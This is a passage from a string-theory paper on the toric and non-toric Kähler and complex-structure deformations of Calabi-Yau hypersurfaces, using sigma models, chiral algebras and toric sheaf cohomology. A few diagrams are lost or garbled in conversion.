\(\mathcal{W}_{\alpha}\) is a short-hand for the components of \(\partial\mathcal{W}=\frac{\partial W}{\partial y^{\alpha}}dy^{\alpha}\), and similarly \(\overline{\mathcal{W}}_{\overline{\alpha}}\) denote the components of \(\bar{\partial\mathcal{W}}\).4 We will find another form of the equations of motion useful as well: Footnote 4: Our notation for the spacetime Dolbeault differential operators \(\partial\) and \(\bar{\partial}\), with \(\text{d}=\partial+\bar{\partial}\) is close to the world-sheet derivatives \(\partial_{z}\) and \(\bar{\partial}\overline{r}\); we hope the subscripts on the latter will lessen the confusion. \[\overline{\mathcal{D}}\,\overline{\mathcal{D}}^{\prime}\mathcal{K}_{ \alpha} =-2m\mathcal{W}_{\alpha}\, \mathcal{D}\mathcal{D}^{\prime}\mathcal{K}_{\overline{\alpha}} =2m\overline{\mathcal{W}}_{\overline{\alpha}}. \tag{11}\] Here again \({\cal K}_{\alpha}=\frac{\partial{\cal K}}{\partial y^{\alpha}}\), and \({\cal K}_{\overline{\alpha}}=\frac{\partial{\cal K}}{\partial\overline{y}^{ \overline{\alpha}}}\). In this notation the Kahler metric is \({\cal G}_{\alpha\overline{\beta}}={\cal K}_{\alpha\overline{\beta}}\). When \({\cal W}=0\) the action has a classical \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) global R-symmetry with the following action: \[\begin{array}{ccccc}\theta^{\prime}&\overline{\theta}^{\prime}&\theta& \overline{\theta}&{\cal Y}^{\alpha}\\ \mathrm{U}(1)_{\mathrm{L}}&+1&-1&0&0&0\\ \mathrm{U}(1)_{\mathrm{R}}&0&0&+1&-1&0\end{array} \tag{12}\] These symmetries are chiral and in general anomalous, and the anomaly is proportional to \(c_{1}(T_{Y})\). However, we will insist that the canonical bundle of \(Y\) is trivial, i.e. \({\cal O}_{Y}(K_{Y})={\cal O}_{Y}\), which implies \(c_{1}(T_{Y})=0\). While the superpotential in general breaks the symmetry, if \(Y\) and \({\cal K}\) admit a holomorphic Killing vector \(v\) such that the Lie derivative with respect to \(v\) preserves the superpotential, i.e. \({\cal L}_{v}{\cal W}={\cal W}\), then the action will preserve a modified \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) symmetry, which has the infinitesimal action \[\delta\theta^{\prime}=i\alpha_{\mathrm{L}}\theta^{\prime}\,\qquad\qquad \delta\theta=i\alpha_{\mathrm{R}}\theta\,\qquad\qquad\delta{\cal Y}^{\alpha}=i \alpha_{\mathrm{L}}{\cal L}_{v}{\cal Y}^{\alpha}+i\alpha_{\mathrm{R}}{\cal L}_ {v}{\cal Y}^{\alpha}. \tag{13}\] In all of our theories the symmetries will be compact and turn out to act with integral charges on a natural basis of the fields. These symmetries will be crucial in making the connection between the UV theory and the IR SCFT. In particular, we will assume that these symmetries flow to the \(\mathrm{U}(1)_{\mathrm{L}}\times\mathrm{U}(1)_{\mathrm{R}}\) R-symmetries of the (2,2) superconformal algebra. This seems to be a sound assumption for flows to compact and unitary (2,2) SCFTs, made implicitly or explicitly in most Lagrangian constructions of such theories. In the more general case of (0,2) supersymmetric flows the circumstances when this assumption is justified remain to be understood [27]. ### A view of Calabi-Yau deformations In this section we develop some of the main tools that we will use in our study of marginal deformations in a particularly well-understood context: the deformations of the SCFT associated to a smooth compact Calabi-Yau manifold \(Y\) based on a large-radius non-linear sigma model description. Our perspective is particularly inspired by [28], as well as observations on conformal perturbation theory such as those given in [29] in a four-dimensional context. Before proceeding, we fix our definition of a compact Calabi-Yau manifold as a smooth Kahler manifold \(Y\), \(\dim_{\mathbb{C}}Y=d\), with trivial canonical bundle and \(H^{i}(Y,{\cal O}_{Y})=0\) for \(0<i<d-1\). The last condition excludes cases such as \(T^{6}\) or \(\mathrm{K}3\times T^{2}\) : there is a good physical reason to do this, since in those cases the superconformal algebra is enhanced, which leads to a different structure of the moduli space of marginal deformations. A recent discussion of the SCFT moduli space in this enhanced context can be found in [30]. With these definitions fixed, we consider the perspective of conformal perturbation theory: the marginal deformations of a (2,2) superconformal theory are encoded in the deforma tion of an "action"5 Footnote 5: This does not require a Lagrangian definition of the SCFT: more generally \(\Delta S\) is used to define (after suitable regularization and renormalization) the perturbed correlation functions via \(\langle\cdots e^{-\Delta S}\rangle\). \[\Delta S_{\rm CFT}=\int d^{2}z\,{\cal D}\overline{\cal D}^{\prime}\widetilde{ \Psi}(z,\overline{z})+\int d^{2}z\,{\cal D}{\cal D}^{\prime}\Psi\ +{\rm h.c.}, \tag{14}\] where \(\widetilde{\Psi}\) is an (a,c) field with \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \((-1,1)\), while \(\Psi\) is a (c,c) field with \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \((1,1)\). When working in a large radius limit, meaning the typical length scale of the compactification geometry is much larger than the string length, we should be able to use the non-linear sigma model fields to describe the spectrum of (a,c) and (c,c) operators and the associated (infinitesimal) deformations, and we will reproduce the familiar results relating the space of infinitesimal deformations to Dolbeault cohomology on \(Y\): \[T_{{\cal M}^{\rm cc}}\simeq H^{0,1}_{\bar{\partial}}(Y,T_{Y})\,\qquad \qquad\qquad T_{{\cal M}^{\rm ac}}\simeq H^{0,1}_{\bar{\partial}}(Y,T^{*}_{Y}). \tag{15}\] We begin with the (a,c) deformations. The superfield \(\widetilde{\Psi}\) should have the following properties: 1. \(\widetilde{\Psi}\) is well-defined on the NLSM target space and is expressed in terms of the superfields \({\cal Y},\overline{\cal Y}\), and their superspace derivatives; 2. it has \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \((-1,1)\); 3. it carries (classical) dimensions \((h_{\rm L},h_{\rm R})=(\frac{1}{2},\frac{1}{2})\); 4. \(\widetilde{\Psi}\) is twisted chiral up to the NLSM equations of motion. Denoting the space of \((p,q)\) forms on \(Y\) by \({\cal A}_{Y}^{p,q}\), we find that properties 1,2,3 imply \[\widetilde{\Psi}=\omega_{\alpha\overline{\beta}}{\cal D}^{\prime}{\cal Y}^{ \alpha}\overline{{\cal D}{\cal Y}}^{\overline{\beta}}+{\cal D}^{\prime} \overline{\cal D}f\, \tag{16}\] where \(\omega\in{\cal A}_{Y}^{1,1}\), and \(f\in{\cal A}_{Y}^{0,0}\). Property 4 holds if and only if \(d\omega=0\). Before we continue, we point out a frequent super-abuse of notation. We will often discuss a geometric quantity, for example the form \[\omega=\omega_{\alpha\overline{\beta}}(y,\overline{y})dy^{\alpha}\wedge d \overline{y}^{\overline{\beta}}\, \tag{17}\] that we will use to construct a superfield expression such as \(\widetilde{\Psi}\). In the latter it should be understood that we replace the coordinate dependence by the corresponding superfields, so that we should really write (already omitting the pullback to the worldsheet!) \[\widetilde{\Psi}=\omega_{\alpha\overline{\beta}}({\cal Y},\overline{\cal Y}){ \cal D}^{\prime}{\cal Y}^{\alpha}\overline{{\cal D}{\cal Y}}^{\overline{\beta }}+{\cal D}^{\prime}\overline{\cal D}f({\cal Y},\overline{\cal Y}). \tag{18}\] We will choose to leave this promotion of coordinates to superfields implicit rather than make the notation unreadable. Returning now to the \(\widetilde{\Psi}\), we see that the space of fields satisfying all of the requirements is infinite dimensional. To obtain a sensible description of the deformation space, we recall one more statement from conformal perturbation theory and Calabi-Yau NLSMs: a supersymmetric deformation of the theory by a global D-term of the form \[\Delta S_{D}=\int d^{2}z{\cal D}_{\rm tot}f\, \tag{2.19}\] amounts to a shift of the Kahler potential by a global function. We expect any such small perturbation to be marginally irrelevant, i.e. to lead to the same IR fixed point. This fits well with the statement in conformal perturbation theory that a supersymmetric D-term deformation of a compact unitary (2,2) SCFT is necessarily irrelevant.6 Footnote 6: This is a well-known statement—see, for example, [31, 32]. With this extra condition, we now observe that if \(\omega-\omega^{\prime}=\partial\bar{\partial}f\) for any function \(f\in{\cal A}^{0,0}(Y)\), then we expect \(\omega\) and \(\omega^{\prime}\) to lead to the same IR fixed point. Hence, the space of marginal (a,c) deformations is isomorphic to the quotient \[\{\omega\in{\cal A}^{1,1}_{Y}\ |d\omega=0\}/\{\omega=\partial\bar{\partial}f\ \ |f\in{\cal A}^{0,0}_{Y}\}. \tag{2.20}\] This is precisely the definition of the Bott-Chern cohomology group \(H^{1,1}_{\rm BC}(Y,\mathbb{C})\).7 Because \(Y\) is a compact Calabi-Yau space, it obeys the \(\partial\bar{\partial}\) lemma, and that in turn implies the isomorphism Footnote 7: A useful review of various cohomology theories on a complex manifold is given in [33]. \[H^{p,q}_{\rm BC}(Y,\mathbb{C})\simeq H^{p,q}_{\bar{\partial}}(Y). \tag{2.21}\] Taking the case of \(p=q=1\) and using \(H^{1,1}_{\bar{\partial}}(Y)\simeq H^{0,1}_{\bar{\partial}}(Y,\Omega^{1}_{Y})\), we recover the expected result for \(T_{{\cal M}^{ac}}\). In the same spirit, we now tackle the (c,c) deformation. We seek fields \(\Psi\) with the following properties: 1. \(\Psi\) is well-defined on the NLSM targetspace and is expressed in terms of the superfields \({\cal Y},\overline{\cal Y}\), and their superspace derivatives; 2. it has \({\rm U}(1)_{\rm L}\times{\rm U}(1)_{\rm R}\) charges \(q_{\rm L}=1\) and \(q_{\rm R}=+1\); 3. it carries (classical) dimensions \(h_{\rm L}=h_{\rm R}=\frac{1}{2}\); 4. \(\Psi\) is chiral up to the NLSM equations of motion. The first three properties then require \[\Psi=\omega_{\overline{\alpha}\overline{\beta}}\overline{\cal D}{\cal Y}^{ \overline{\alpha}}\overline{\cal D}^{\prime}\overline{\cal Y}^{\overline{ \beta}}+\overline{\cal D}{\cal D}^{\prime}f\, \tag{2.22}\] where \(\omega\in{\cal A}^{0,0}_{Y}(\bar{T}^{*}_{Y}\otimes\bar{T}^{*}_{Y})\), and \(f\in{\cal A}^{0,0}_{Y}\). Using the NLSM equations of motion, we find that the last requirement translates into two differential conditions that involve the Kahler connection, which we denote by \(\nabla\): \[\nabla_{\overline{\alpha}}\omega_{\overline{\gamma}\overline{ \beta}} =\nabla_{\overline{\gamma}}\omega_{\overline{\alpha}\overline{\beta}}\, \nabla_{\overline{\beta}}\omega_{\overline{\alpha}\overline{ \gamma}} =\nabla_{\overline{\gamma}}\omega_{\overline{\alpha}\overline{\beta}}. \tag{23}\] To solve these conditions it is convenient to define \(\eta^{\beta}_{\overline{\alpha}}=\omega_{\overline{\alpha}\overline{\beta}} \mathcal{G}^{\overline{\beta}\alpha}\). The first differential condition is then equivalent to \(\bar{\partial}\eta=0\), while the second becomes \[\nabla\pi\mu_{\overline{\alpha}\overline{\beta}}=0\, \tag{24}\] where \(\mu\in{\cal A}^{0,2}_{Y}\) is given by \[\mu_{\overline{\beta}\overline{\alpha}}={\cal G}_{\beta\overline{ \beta}}\eta^{\beta}_{\overline{\alpha}}-{\cal G}_{\beta\overline{\alpha}}\eta^ {\beta}_{\overline{\beta}}. \tag{25}\] The condition (24) is restrictive. If we use the metric to raise the indices and contract with the unique holomorphic \(d\)-form \(\Omega\), we obtain \[\widetilde{\mu}_{\beta_{1}\cdots\beta_{d-2}}=\mu_{\overline{\alpha}\overline{ \beta}}\mathcal{G}^{\overline{\alpha}\alpha}\mathcal{G}^{\overline{\beta} \beta}\Omega_{\alpha\beta\beta_{1}\cdots\beta_{d-2}}\, \tag{26}\] and the condition on \(\mu\) is equivalent to \(\bar{\partial}\widetilde{\mu}=0\), i.e. \(\widetilde{\mu}\) defines a class in \(H^{d-2,0}_{\bar{\partial}}(Y,{\cal O}_{Y})\). This group is empty because \(Y\) is Calabi-Yau, which implies \(\widetilde{\mu}=0\). Because \(\Omega\) is non-degenerate, we conclude that \(\mu=0\) as well. So, the only way to satisfy our conditions is to solve \[\bar{\partial}\eta=0\, {\cal G}_{\beta\overline{\beta}}\eta^{\beta}_{\overline{\alpha }}-{\cal G}_{\beta\overline{\alpha}}\eta^{\beta}_{\overline{\beta}}=0. \tag{27}\] Let \(\eta\) be a representative of a cohomology class \([\eta]\in H^{0,1}_{\bar{\partial}}(Y,T_{Y})\). We will now show that we can always find another representative \[\widetilde{\eta}=\eta+\bar{\partial}\lambda \tag{28}\] for some \(\lambda\in{\cal A}^{0,0}(Y,T_{Y})\) such that \(\widetilde{\eta}\) satisfies the second condition in (27). We need to find \(\lambda\) such that \[\nabla_{\overline{\beta}}\lambda^{\beta}{\cal G}_{\beta\overline{ \alpha}}-\nabla_{\overline{\alpha}}\lambda^{\beta}{\cal G}_{\beta\overline{ \beta}}={\cal G}_{\beta\overline{\beta}}\eta^{\beta}_{\overline{\alpha}}-{ \cal G}_{\beta\overline{\alpha}}\eta^{\beta}_{\overline{\beta}}. \tag{29}\] Using \(\bar{\partial}\eta=0\) it is not hard to show that the right-hand-side is a \(\bar{\partial}\)-closed (0,2) form. On \(Y\) any such form is \(\bar{\partial}\)-exact, so that there exists some (0,1) form \(\rho\) such that \[{\cal G}_{\beta\overline{\beta}}\eta^{\beta}_{\overline{\alpha}}-{\cal G}_{ \beta\overline{\alpha}}\eta^{\beta}_{\overline{\beta}}=\nabla_{\overline{ \beta}}\rho_{\overline{\alpha}}-\nabla_{\overline{\alpha}}\rho_{\overline{ \beta}}. \tag{30}\] We can therefore set \(\lambda^{\beta}={\cal G}^{\overline{\beta}\beta}\rho_{\overline{\beta}}\). We have shown that every cohomology class \([\eta]\in H^{0,1}_{\partial}(Y,T_{Y})\) has a representative \(\eta\) satisfying (2.27); we can change the representative to \(\eta^{\prime}=\eta+\bar{\partial}\lambda\), which will also satisfy (2.27) if and only if \(\lambda\) obeys \[\nabla_{\overline{\beta}}(\lambda^{\beta}{\cal G}_{\beta\overline{ \alpha}})-\nabla_{\overline{\alpha}}(\lambda^{\beta}{\cal G}_{\beta\overline{ \beta}})=0. \tag{2.31}\] On \(Y\) this is only possible if \(\lambda^{\beta}=\nabla^{\beta}f\) for some function \(f\). Coming back to the form of the deformation, we see that such a shift amounts to \(\omega_{\overline{\alpha}\overline{\beta}}\to\omega_{\overline{\alpha} \overline{\beta}}+\nabla_{\overline{\alpha}}\nabla_{\overline{\beta}}f\). Using our equations of motion we have \[\overline{\cal D}\overline{\cal D}^{\prime}f=\overline{\cal D} \left[\nabla_{\overline{\beta}}f\overline{\cal D}^{\prime}\overline{\cal Y}^{ \overline{\beta}}\right]=\partial_{\overline{\alpha}}\left(\nabla_{\overline {\beta}}f\right)\overline{\cal D}\overline{\cal Y}^{\overline{\alpha}} \overline{\cal D}^{\prime}\overline{\cal Y}^{\overline{\beta}}+\nabla_{ \overline{\beta}}f\overline{\cal D}\overline{\cal D}^{\prime}\overline{ \cal Y}^{\overline{\beta}}=\nabla_{\overline{\alpha}}\nabla_{\overline{ \beta}}f\overline{\cal D}\overline{\cal Y}^{\overline{\alpha}}\overline{\cal Y }^{\overline{\beta}}. \tag{2.32}\] So, the remaining freedom in shifting the representative of \([\eta]\) yields an irrelevant D-term deformation. We have recovered the other familiar result: \(T_{{\cal M}^{\rm cc}}\simeq H^{0,1}_{\partial}(Y,T_{Y})\). It is not surprising that we have reproduced the expected structure for the first order deformations of a large radius non-linear sigma model, because the supposition is that this Lagrangian theory is indeed superconformal for an appropriately chosen Kahler metric \({\cal G}\). We note that the two types of deformation differ in one important aspect: we did not use the equations of motion in discussing the (a,c) deformations, and, indeed, there is no issue with adding to the action a small but finite (a,c) deformation of the form above. This will shift the complexified Kahler class of the theory, and of course the action so obtained is equivalent to one with a new Kahler potential \({\cal K}_{\rm new}\). On the other hand, the (c,c) deformation as we have written it is only infinitesimal because the supersymmetry requirements only hold up to equations of motion. This is easy to understand: the action written in terms of a choice of chiral superfields uses a fixed complex structure, so while the deformation is certainly integrable (either in the sense of complex geometry or superconformal field theory), we cannot hope to express the form of a finite deformation in terms of the original chiral superfields. ### A chiral algebra perspective Before we leave this warm-up exercise, we point out one more perspective that will be useful to us below, a view based on the chiral algebra of the theory, which we can think of as the cohomology of \(\overline{\cal D}\).8 This is a structure that exists in any (0,2) quantum field theory, and in favorable circumstances we can assume that it is isomorphic to the cohomology of the right-moving supercharge \(G^{+}_{-1/2}\) of the IR SCFT. In the case of (2,2) theories that we consider the \(\overline{\cal D}\) cohomology contains a holomorphic N=2 superconformal algebra that includes a representative of the U(1)\({}_{\rm L}\) current [22]. We will assume that in the IR this algebra indeed becomes the left-moving superconformal algebra. Footnote 8: Foundational papers on this structure in two-dimensional theories include [34; 35; 36]. The structure has a close relationship to the chiral de Rham complex [37] and its generalizations. It has been explored more recently in the context of Landau-Ginzburg models in [38] and in hybrid CFTs in [22; 39]. A pedagogical discussion is given in [6], and subtleties in (0,2) applications are pointed out in [27]. This offers a straightforward way to identify representatives of marginal (a,c) and (c,c) operators: we need to merely identify the cohomology classes of operators with \(q_{\mbox{\tiny R}}=+1\), \(q_{\mbox{\tiny L}}=\pm 1\), and spin 0. If our assumption about the RG flow is correct, then each such cohomology class corresponds in the SCFT to a chiral primary operator on the right with \(q_{\mbox{\tiny R}}=+1\). Since the RG flow preserves the spin \(h_{\mbox{\tiny L}}-h_{\mbox{\tiny R}}=0\), we also have \[h_{\mbox{\tiny L}}=h_{\mbox{\tiny R}}=\tfrac{1}{2}q_{\mbox{\tiny R}}=\tfrac{1} {2}. \tag{33}\] Since \(q_{\mbox{\tiny L}}=\pm 1\), the operator must therefore either be anti-chiral primary on the left (\(q_{\mbox{\tiny L}}=-1\)) or chiral primary on the left (\(q_{\mbox{\tiny L}}=+1\)). It is a simple exercise to apply this the (a,c) and (c,c) deformations of the classical non-linear sigma model to easily reproduce the results we reviewed above. However, the point for us is that studying the chiral algebra will be much simpler in the massive theories that are our main interest. Although we will not pursue this in this work, it is important to keep in mind that this identification is computationally powerful. For example, it allows us to evaluate correlation functions and OPEs of these operators in a half-twisted theory, and these computations are essentially as powerful as similar computations in a topologically twisted theory [6; 40], at least at genus 0. Denoting by \(\mathcal{H}_{\overline{\mathcal{D}}}\) the full chiral algebra of the theory, we are then interested in characterizing the subspaces \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm ac}\) and \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}\) corresponding to spin 0 operators with \(q_{\mbox{\tiny L}}\), \(q_{\mbox{\tiny R}}\) as described above. These vector spaces have subspaces defined by the toric and polynomial deformations: \[\mathcal{H}_{\overline{\mathcal{D}}}^{\rm toric}\subseteq\mathcal{H}_{ \overline{\mathcal{D}}}^{\rm ac}\, \mathcal{H}_{\overline{\mathcal{D}}}^{\rm poly}\subseteq \mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}. \tag{34}\] Non-toric and non-polynomial deformations are then naturally thought of as equivalence classes belonging to, respectively, the quotient vector spaces \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm ac}/\mathcal{H}_{\overline{\mathcal{ D}}}^{\rm toric}\) and \(\mathcal{H}_{\overline{\mathcal{D}}}^{\rm cc}/\mathcal{H}_{\overline{\mathcal{ D}}}^{\rm poly}\), and our goal is to provide an appropriate operator for each equivalence class. ## 3 Hypersurface geometry In this section we use a geometric perspective to characterize the deformations for a special class of Calabi-Yau manifolds: \(X\) is a smooth hypersurface in a projective and simplicial 4-dimensional NEF Fano toric variety \(V\) with at worst terminal singularities. Recall that a variety \(V\) is NEF Fano if and only if it is complete, and its anti-canonical divisor \(-K_{V}\) is NEF, i.e. has a non-negative intersection with every curve in \(V\). Moreover, \(V\) is a Gorenstein variety, and its only singularities are terminal Gorenstein singularities which occur in codimension 4 [14]: these singularities are missed by a generic hypersurface. We focus on this class because it contains an enormous set of examples [41] with a simple combinatorial description, a canonical lift to a UV gauged linear sigma model [12], and a beautiful mirror construction [10]. Moreover, there is a concrete description of the deformation spaces and their splits into toric/non-toric and polynomial/non-polynomial sets. The characterization of the deformations was crucial for early tests of mirror symmetry in this construction [10; 13], but instead of giving the usual treatment--for example reviewed in [14]--we will give a presentation that is well-suited for our purposes following a method given in [42]. ### A little toric geometry We begin by setting notation and summarizing a few key results in toric geometry, mostly following the excellent text [43]. Fix a \(d\)-dimensional lattice \(N\simeq\mathbb{Z}^{d}\). Let \(V\) be a projective simplicial toric variety with fan \(\Sigma_{V}\subset N_{\mathbb{R}}=N\otimes_{\mathbb{Z}}\mathbb{R}\). Denote by \(\Sigma_{V}(1)\) the collection of 1-dimensional cones, indexed by the primitive generators \(u_{\rho}\in N\), with \(\rho=1,\ldots,n=|\Sigma_{V}(1)|\). In terms of the homogeneous Cox coordinates, for every \(\rho\) there is a homogeneous coordinate \(Z_{\rho}\) for \(\mathbb{C}^{n}\), and we can describe \(V\) as a quotient \[V=\left\{\mathbb{C}^{n}\setminus F\right\}/\left\{(\mathbb{C}^{*})^{n-d} \times H\right\}\, \tag{3.1}\] where \(H\) is a finite abelian group, \(F\) is a union of intersections of hyperplanes determined by the fan, and the \(\mathbb{C}^{*}\) action is encoded in a matrix of charges \(\mathbf{q}\). The toric divisors \(D_{\rho}\), obtained as projections of the loci \(\left\{\mathbb{Z}_{\rho}=0\right\}\) will play an important role in our story. We note two key properties: 1. the canonical divisor of the toric variety is given by \[K_{V}=-\sum_{\rho}D_{\rho}\ ;\] (3.2) 2. each toric divisor is Cartier, and the group of line bundles \(\operatorname{Pic}(V)\) is generated by the corresponding line bundles \(\mathcal{O}_{V}(D_{\rho})\), where \(\mathcal{O}_{V}\) is the structure sheaf of \(V\). We set \(W=\operatorname{Pic}(V)\otimes_{\mathbb{Z}}\mathbb{C}\). The tangent sheaf \(T_{V}\) and the cotangent sheaf \(\Omega^{1}_{V}\) fit into the exact sequences9 Footnote 9: When \(V\) is smooth, these sheaves have their usual geometric meaning. More generally, when \(V\) is a projective and simplicial, these sheaves should be understood as the appropriate generalizations of the geometric objects. A careful discussion is given in [43]. \[\begin{CD}0@>{}>{}>W^{*}\otimes\mathcal{O}_{V}@>{E}>{}>\bigoplus_{\rho} \mathcal{O}_{V}(D_{\rho})@>{}>{}>T_{V}@>{}>{}>0\,\\ \\ 0@>{}>{}>\Omega^{1}_{V}@>{}>{}>\bigoplus_{\rho}\mathcal{O}_{V}(-D_{\rho})@>{E ^{T}}>{}>W\otimes\mathcal{O}_{V}@>{}>{}>0\,\end{CD} \tag{3.3}\] where the map \(E\) is given by \[E(v)=\left(v\cdot\mathbf{q}_{1}Z_{1},v\cdot\mathbf{q}_{2}Z_{2},\ldots,v\cdot \mathbf{q}_{n}Z_{n}\right). \tag{3.4}\] Using these exact sequences it is possible to prove a number of remarkable vanishing theorems that hold for NEF Fano simplicial toric varieties, including10 Footnote 10: Proofs and details of these theorems can be found in chapter 9 of [43]. \[H^{p}(V,\Omega_{V}^{q})=0\qquad\text{for }p\neq q\, \tag{3.5}\] and for any NEF divisor \(D\) on \(V\) \[H^{p}(V,\mathcal{O}_{V}(D))=0\qquad\text{for }p>0. \tag{3.6}\] We will often use these vanishing results together with Serre duality (which holds since \(V\) is Gorenstein): \[H^{p}(V,\mathcal{E})\simeq\overline{H^{d-p}(V,\mathcal{E}^{*} \otimes\mathcal{O}_{V}(K_{V}))}. \tag{3.7}\] Using these results we can prove another vanishing result that will play an important role in what follows: \[H^{i}(V,\mathcal{O}_{V}(-D_{\rho}))=0. \tag{3.8}\] This can be seen as follows. First we observe that \(H^{0}(V,\mathcal{O}_{V}(-D_{\rho}))=0\) because given a section \(\lambda\in H^{0}(V,\mathcal{O}_{V}(-D_{\rho}))\) we would obtain a non-constant section \(Z_{\rho}\lambda\in H^{0}(V,\mathcal{O}_{V})\), which is impossible on a projective variety. Next, the cotangent sheaf exact sequence leads to a long exact sequence in cohomology which includes (3.9) so that using (3.5) we see \(H^{i}(V,\mathcal{O}_{V}(-D_{\rho}))=0\) for \(i\geq 2\). The remaining part of the long exact sequence is (3.10) but since the first two terms are isomorphic for a projective simplicial toric variety, the desired result holds for \(i=1\) as well. ### Complex structure deformations We set \(X=\{P=0\}\subset V\), where \(P\) is a generic holomorphic section of the anticanonical bundle: \(P\in H^{0}(V,\mathcal{O}_{V}(-K_{V}))\). We reviewed above that \(T_{\mathcal{M}^{\text{cc}}}\simeq H^{1}(X,T_{X})\). Our goal now is to describe \(H^{1}(X,T_{X})\) for the hypersurface in a way that explicitly identifies the polynomial and non-polynomial deformations. In this section we closely follow [42]. The first step is to observe that the adjunction sequence together with the Euler sequence of (3.3) imply that the tangent sheaf \(T_{X}\) is obtained as the cohomology of the complex \[\mathcal{E}^{\bullet}=0\xrightarrow{}W^{*}\otimes\mathcal{O}_{X} \xrightarrow{E}\underbrace{\bigoplus_{\rho}\mathcal{O}_{X}(D_{\rho})} _{=\mathcal{E}^{0}}\xrightarrow{dP}\mathcal{O}_{X}(-K_{B})\xrightarrow{}0. \tag{3.11}\] This complex is exact except at the \(0\)-th position, and when \(V\) is smooth it has the interpretation that vectors on \(X\) are the vectors on \(V\) that preserve the hypersurface.11 The sheaves on \(X\) that show up in (3.11) are obtained by pulling back divisors from \(V\) to \(X\), and are related to sheaves on \(V\) through the exact sequence Footnote 11: This is familiar to gauged linear sigma model experts, making its appearance in that context already in [5]. \[0\xrightarrow{}\mathcal{O}_{V}(D+K_{V})\xrightarrow{}\mathcal{O}_{V}(D) \xrightarrow{}\mathcal{O}_{X}(D)\xrightarrow{}0. \tag{3.12}\] The total cohomology, also known as hypercohomology, of the complex \(\mathcal{E}^{\bullet}\), calculated by a spectral sequence whose first page is \(E_{1}^{p,q}=H^{q}(X,\mathcal{E}^{p})\), converges to \(H^{p+q}(X,\mathcal{E}^{\bullet})\). Since \(T_{X}\) is obtained as the ordinary cohomology of \(\mathcal{E}^{\bullet}\), which fails to be exact just at the middle \(\mathcal{E}^{0}\) term, this gives a method for calculating \(H^{1}(X,T_{X})\). In more detail, the first page of the spectral sequence only has non-zero entries for \(|p|\leq 1\), which include \[\begin{CD}\xy@{}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={ }={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}= {}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}= {}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}={}= {}={} While this result was given in [42], we will next take it a step further and show \[T_{\mathcal{M}^{\rm cc}}/\left.T_{\mathcal{M}^{\rm cc}}\right|_{\rm poly}=\bigoplus_ {\rho}H^{1}(X,\mathcal{O}_{X}(D_{\rho}))=H^{1}(V,T_{V})\, \tag{3.14}\] i.e. the non-polynomial deformations of the hypersurface \(X\subset V\) are exactly the deformations of complex structure of the ambient variety \(V\)--a satisfying result that was already obtained through a somewhat different approach in [44]. To prove the desired isomorphism we note that Serre duality and (3.8) imply that \(H^{i}(V,\mathcal{O}_{V}(D_{\rho}+K_{V}))=0\) for all \(i\). This in turn implies via (3.12) that \(H^{i}(X,\mathcal{O}_{X}(D_{\rho}))=H^{i}(V,\mathcal{O}_{V}(D_{\rho}))\). Finally, taking the long exact sequence associated to the Euler sequence for tangent sheaf on \(V\), the result follows. ### Complexified Kahler deformations While the results in the previous section were a review of previous work, reproducing a known result from a somewhat different point of view, we will now apply the same machinery to discussing the toric and non-toric complexified Kahler deformations, which to our best knowledge have not been previously considered from this point of view. The conventional view on these deformations is obtained in three statements [14]. First, we observe that given the inclusion \(i:X\hookrightarrow V\) we can pull back divisors on \(V\) to those on \(X\). However, some divisors on \(V\) do not intersect \(X\), and these pull back to \(0\) (up to linear equivalence) on \(V\). Taking this into account we obtain the toric divisors on \(X\) and then of course also the corresponding classes in \(H^{1}(X,\Omega^{1}_{X})\). Finally, it can be that some of the toric divisors become reducible when pulled back to \(X\), leading to independent complexified Kahler deformations on \(X\) that cannot be obtained by pulling back a complexified Kahler class from \(V\). We will instead follow a different approach to describe the non-toric deformations directly in terms of properties of \(V\). The idea is simple: we can apply exactly the methods of the previous section but now to the cotangent sheaf represented as the cohomology of the complex \[\mathcal{F}^{\bullet}=\begin{array}{c}0\\ \end{array}\mathcal{O}_{X}(K_{V})\xrightarrow[]{dP}\underbrace{\bigoplus_{ \rho}\mathcal{O}_{X}(-D_{\rho})}_{=\mathcal{F}^{0}}\xrightarrow[]{E^{T}}W \otimes\mathcal{O}_{X}\xrightarrow[]{}0. \tag{3.15}\] The first page of the spectral sequence for the total cohomology of \(\mathcal{F}^{\bullet}\) is then Once again we marked the vanishing groups in light pink; this time it is the groups on the left that vanish by combining (3.12) with (3.5) and (3.6), while the groups on the right vanish because \(X\) is Calabi-Yau. The bottom row encodes the toric deformations, while from the first row we obtain \[T_{\mathcal{M}^{\text{ac}}}/\left.T_{\mathcal{M}^{\text{ac}}}\right|_{\text{ toric}}=\bigoplus_{\rho}H^{1}(X,\mathcal{O}_{X}(-D_{\rho}))=H^{2}(V,\Omega^{1}_{V} \otimes\mathcal{O}_{V}(K_{V})). \tag{3.16}\] The last isomorphism can be obtained in two steps. First, the long exact sequence associated to (3.12) with \(D=-D_{\rho}\) and the vanishing (3.8) yield the isomorphism \[H^{1}(X,\mathcal{O}_{X}(-D_{\rho}))=H^{2}(V,\mathcal{O}_{V}(-D_{\rho})\otimes \mathcal{O}_{V}(K_{V})). \tag{3.17}\] Next, taking the cotangent sheaf exact sequence and tensoring with \(\mathcal{O}_{V}(K_{V})\) we obtain the exact sequence (3.18) and since by Serre duality \(H^{i}(V,\mathcal{O}_{V}(K_{V}))=0\) for \(i\neq 4\), the associated long exact sequence yields the claimed isomorphism. ## 4 Marginal operators in the hypersurface hybrid In the previous section we obtained a characterization of the non-toric and non-polynomial deformations of a hypersurface \(X\subset V\): \[T_{\mathcal{M}^{\text{cc}}}/\left.T_{\mathcal{M}^{\text{cc}}}\right|_{\text{ poly}}=H^{1}(V,T_{V})\,\qquad 